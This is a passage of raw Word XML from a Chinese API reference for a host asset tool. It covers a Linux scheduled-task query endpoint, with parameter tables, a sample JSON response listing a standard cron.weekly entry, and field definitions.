            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559E59BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E5262A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF5DAD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0215E3A6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF2DBEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EC0165" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FE418F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3525B177" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CB875BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCB05E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33AD24CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1469AB13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D4A486" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35AABE7C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B89E00A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6364B1E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2909D5B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7957BAEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55798317" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725A7149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>execPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B90059" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4F0F80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A12920C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行命令或脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="519FF25C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A6F40E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CED89BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC9EA87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3037395A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="130D5572" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="002183E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CDC52E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11123927" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03273AF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CFBC70E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0193AFBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C9AE6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693500A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316724CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类型（仅CRONTAB/AT/BATCH三类）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42104438" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515F3E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/task/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="363AE3C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40EA44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "47 6\t* * 7\t",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test -x /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>anacron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> || ( cd / &amp;&amp; run-parts --report /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.weekly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> )",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "conf": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/crontab",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2016-04-06 05:59:09",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crondOpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167E32F"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452"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2725CB3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983498D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA9B15D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55062276" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6764F55C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="665E8C45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF22CC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38AC13A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C79B26C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23BEB626" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E23BB6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5438234F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08AF6B4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB3A457" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B468C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E22844E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BDA6CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="458D3929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D6AC51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279D71C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18F6F050" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3A9A32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3A65A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="675A8A50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17790664" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F79229C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546DF990" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0BF49D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B3E2B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0D1205" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
